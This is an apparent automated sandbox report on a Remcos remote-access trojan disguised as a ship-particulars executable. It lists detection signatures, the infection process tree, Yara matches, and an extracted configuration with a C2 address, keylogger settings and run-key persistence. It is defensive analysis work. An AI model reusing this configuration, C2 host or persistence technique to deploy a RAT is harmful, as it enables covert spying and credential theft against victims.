Loading ...

Play interactive tourEdit tour

Analysis Report MV OLYMPIC PROGRESS VSL PARTICULARS.exe

Overview

General Information

Sample Name:MV OLYMPIC PROGRESS VSL PARTICULARS.exe
Analysis ID:422673
MD5:6fb384af6e5fd9d345650e37b1b58098
SHA1:d4094353b97c47f35057a343049e854ddc01d90d
SHA256:fc08a11aa7b0c98831ecbfff1742a3099466919e12ce8169639ec1cdefb5e2c3
Tags:exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MV OLYMPIC PROGRESS VSL PARTICULARS.exe (PID: 2584 cmdline: 'C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
    • MV OLYMPIC PROGRESS VSL PARTICULARS.exe (PID: 5888 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
      • cmd.exe (PID: 5472 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 1020 cmdline: PING 127.0.0.1 -n 2 MD5: 70C24A306F768936563ABDADB9CA9108)
        • svchosts.exe (PID: 4300 cmdline: 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
          • svchosts.exe (PID: 6060 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
          • svchosts.exe (PID: 1632 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
  • svchosts.exe (PID: 2420 cmdline: 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
    • svchosts.exe (PID: 5020 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
  • svchosts.exe (PID: 6932 cmdline: 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' MD5: 6FB384AF6E5FD9D345650E37B1B58098)
    • svchosts.exe (PID: 4936 cmdline: {path} MD5: 6FB384AF6E5FD9D345650E37B1B58098)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "185.244.26.244:5888:pass|", "Assigned name": "Host", "Connect interval": "5", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "svchosts.exe", "Startup value": "remcos", "Hide file": "Enable", "Mutex": "remcos_lfqwkauxufogluh", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "remcos"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpRemcos_1Remcos Payloadkevoreilly
    • 0x11034:$name: Remcos
    • 0x118a8:$name: Remcos
    • 0x118fb:$name: REMCOS
    • 0x10688:$time: %02i:%02i:%02i:%03i
    • 0x11320:$time: %02i:%02i:%02i:%03i
    • 0x29fc:$crypto: 0F B6 96 08 04 00 00 89 10 8B 45 08 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F4 FB FF FF 30 ...
    00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpRemcosdetect Remcos in memoryJPCERT/CC Incident Response Group
    • 0x11034:$remcos: Remcos
    • 0x118a8:$remcos: Remcos
    • 0x118e0:$url: Breaking-Security.Net
    • 0x160ea:$resource: SETTINGS
    00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x114dc:$funcs1: autogetofflinelogs
    • 0x114c0:$funcs2: clearlogins
    • 0x114f0:$funcs3: getofflinelogs
    • 0x11578:$funcs4: execcom
    • 0x114cc:$funcs5: deletekeylog
    • 0x11798:$funcs6: remscriptexecd
    • 0x115bc:$funcs7: getwindows
    • 0x10da0:$funcs8: fundlldata
    • 0x10d78:$funcs9: getfunlib
    • 0x107ec:$funcs10: autofflinelogs
    • 0x113b8:$funcs11: getclipboard
    • 0x114b4:$funcs12: getscrslist
    • 0x107e0:$funcs13: offlinelogs
    • 0x105c8:$funcs14: getcamsingleframe
    • 0x116e4:$funcs15: listfiles
    • 0x115e0:$funcs16: getproclist
    • 0x10828:$funcs17: onlinelogs
    • 0x11700:$funcs18: getdrives
    • 0x11784:$funcs19: remscriptsuccess
    • 0x10600:$funcs20: getcamframe
    • 0x1115c:$str_a1: C:\Windows\System32\cmd.exe
    00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      Click to see the 39 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      36.2.svchosts.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        36.2.svchosts.exe.400000.0.raw.unpackRemcos_1Remcos Payloadkevoreilly
        • 0x11034:$name: Remcos
        • 0x118a8:$name: Remcos
        • 0x118fb:$name: REMCOS
        • 0x10688:$time: %02i:%02i:%02i:%03i
        • 0x11320:$time: %02i:%02i:%02i:%03i
        • 0x29fc:$crypto: 0F B6 96 08 04 00 00 89 10 8B 45 08 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F4 FB FF FF 30 ...
        36.2.svchosts.exe.400000.0.raw.unpackRemcosdetect Remcos in memoryJPCERT/CC Incident Response Group
        • 0x11034:$remcos: Remcos
        • 0x118a8:$remcos: Remcos
        • 0x118e0:$url: Breaking-Security.Net
        • 0x160ea:$resource: SETTINGS
        36.2.svchosts.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
        • 0x114dc:$funcs1: autogetofflinelogs
        • 0x114c0:$funcs2: clearlogins
        • 0x114f0:$funcs3: getofflinelogs
        • 0x11578:$funcs4: execcom
        • 0x114cc:$funcs5: deletekeylog
        • 0x11798:$funcs6: remscriptexecd
        • 0x115bc:$funcs7: getwindows
        • 0x10da0:$funcs8: fundlldata
        • 0x10d78:$funcs9: getfunlib
        • 0x107ec:$funcs10: autofflinelogs
        • 0x113b8:$funcs11: getclipboard
        • 0x114b4:$funcs12: getscrslist
        • 0x107e0:$funcs13: offlinelogs
        • 0x105c8:$funcs14: getcamsingleframe
        • 0x116e4:$funcs15: listfiles
        • 0x115e0:$funcs16: getproclist
        • 0x10828:$funcs17: onlinelogs
        • 0x11700:$funcs18: getdrives
        • 0x11784:$funcs19: remscriptsuccess
        • 0x10600:$funcs20: getcamframe
        • 0x1115c:$str_a1: C:\Windows\System32\cmd.exe
        36.2.svchosts.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 58 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "185.244.26.244:5888:pass|", "Assigned name": "Host", "Connect interval": "5", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "svchosts.exe", "Startup value": "remcos", "Hide file": "Enable", "Mutex": "remcos_lfqwkauxufogluh", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "remcos", "Keylog folder": "remcos"}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeMetadefender: Detection: 34%Perma Link
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeReversingLabs: Detection: 86%
          Multi AV Scanner detection for submitted fileShow sources
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeVirustotal: Detection: 71%Perma Link
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeMetadefender: Detection: 34%Perma Link
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeReversingLabs: Detection: 86%
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 1632, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 5020, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 5888, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchosts.exe PID: 4936, type: MEMORY
          Source: Yara matchFile source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeJoe Sandbox ML: detected
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs17_2_00402C45
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,17_2_0040BC9B
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all17_2_00403183
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose,17_2_0040F234
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_00405AFB
